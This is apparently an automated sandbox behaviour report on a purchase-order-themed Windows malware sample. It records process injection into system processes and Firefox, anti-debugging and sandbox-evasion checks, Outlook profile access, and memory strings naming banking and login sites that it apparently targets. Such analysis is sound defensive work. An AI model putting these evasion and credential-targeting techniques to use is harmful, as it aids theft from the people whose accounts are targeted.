            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO# Q919240.exeStatic file information: File size 1412827 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fALrZoEgBHis.exe, 00000003.00000000.1576220938.00000000005EE000.00000002.00000001.01000000.00000004.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2705527345.00000000005EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: PO# Q919240.exeStatic PE information: real checksum: 0xa961f should be: 0x1617b3
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403060 push eax; ret 2_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160FC push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041613C push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D211 pushad ; ret 2_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004132A3 push esi; ret 2_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041136F push edi; retf 2_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135D8 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135E3 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414594 push edi; retf 2_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E61E push eax; retf 2_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016F6 push ss; ret 2_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A709AD push ecx; mov dword ptr [esp], ecx5_2_03A709B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_032FE30C push edi; retf 5_2_032FE30F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03300240 push esi; ret 5_2_03300245
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0331452B push ds; iretd 5_2_0331454B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03300575 push ds; retf 5_2_0330058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03300580 push ds; retf 5_2_0330058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03304838 push C5503231h; retf 5_2_03304840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03304F68 push edx; iretd 5_2_03304F6A
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO# Q919240.exeAPI/Special instruction interceptor: Address: 4265294
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9833Jump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87540
            Source: C:\Users\user\Desktop\PO# Q919240.exeAPI coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432Thread sleep count: 140 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432Thread sleep time: -280000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432Thread sleep count: 9833 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432Thread sleep time: -19666000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe TID: 6944Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0330C2C0 FindFirstFileW,FindNextFileW,FindClose,5_2_0330C2C0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 01194HH4.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 01194HH4.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 01194HH4.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: netbtugc.exe, 00000005.00000002.2711918868.0000000008604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169649
            Source: 01194HH4.5.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 01194HH4.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 01194HH4.5.drBinary or memory string: discord.comVMware20,11696492231f
            Source: firefox.exe, 0000000A.00000002.2065216598.0000024B3BABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE
            Source: 01194HH4.5.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 01194HH4.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 01194HH4.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 01194HH4.5.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 01194HH4.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 01194HH4.5.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
            Source: 01194HH4.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 01194HH4.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: fALrZoEgBHis.exe, 00000006.00000002.2707216223.000000000112F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 01194HH4.5.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: netbtugc.exe, 00000005.00000002.2711918868.0000000008604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,116
            Source: 01194HH4.5.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 01194HH4.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 01194HH4.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\PO# Q919240.exeAPI call chain: ExitProcess graph end nodegraph_0-86663
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172B3 LdrLoadDll,2_2_004172B3
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_04265500 mov eax, dword ptr fs:[00000030h]0_2_04265500
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_04265560 mov eax, dword ptr fs:[00000030h]0_2_04265560
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_04263ED0 mov eax, dword ptr fs:[00000030h]0_2_04263ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
